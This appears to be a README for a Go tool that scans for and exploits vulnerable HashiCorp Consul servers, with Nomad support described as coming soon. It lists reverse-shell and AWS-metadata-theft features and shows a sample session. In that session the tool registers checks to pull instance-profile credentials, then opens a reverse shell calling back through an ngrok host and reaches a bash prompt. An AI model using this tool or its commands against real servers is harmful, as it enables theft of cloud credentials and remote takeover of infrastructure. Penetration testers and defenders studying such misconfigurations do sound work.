
Scanning / Exploiting vulnerable hashicorp infra

Primary LanguageGo


Scanning / Exploiting vulnerable hashicorp tools

Features Consul

  • AWS Meta data extraction
  • Status (Check if vulnerable
  • Reverse shell
  • Custom payload
  • scanning for vulnerable servers

Features Nomad (Coming soon)

  • AWS Meta data extraction
  • Status (Check if vulnerable
  • Reverse shell ( Raw_exec/ exec / docker)
  • Custom payload
  • scanning for vulnerable servers


Start ngrok ./ngrok tcp 9000

Connected <>$ check status
DisableRemoteExec: true
EnableRemoteScriptChecks: true
NodeName: mini.hsd1.wa.comcast.net
Version: 1.9.3
Server: true
Connected <>$ exploit metadata
Check Registered
Waiting for command to register...
ID: Test
HTTP GET 200 OK Output: {
  "Code" : "Success",
  "LastUpdated" : "2021-02-25T06:15:20Z",
  "InstanceProfileArn" : "arn:aws:iam::*************************************",
  "InstanceProfileId" : "AIPA2LE*************"
Check Deregistered

(cmd ngrok-host ngrok-port local-port) ** can replace ngrok with external ip.

Connected <>$ exploit shell 2.tcp.ngrok.io 18563 9000
Check Registered
Waiting for callback...
2021/02/24 23:16:21 Listening on localhost:9000
Check Deregistered
Client connected.
bash-$: whoami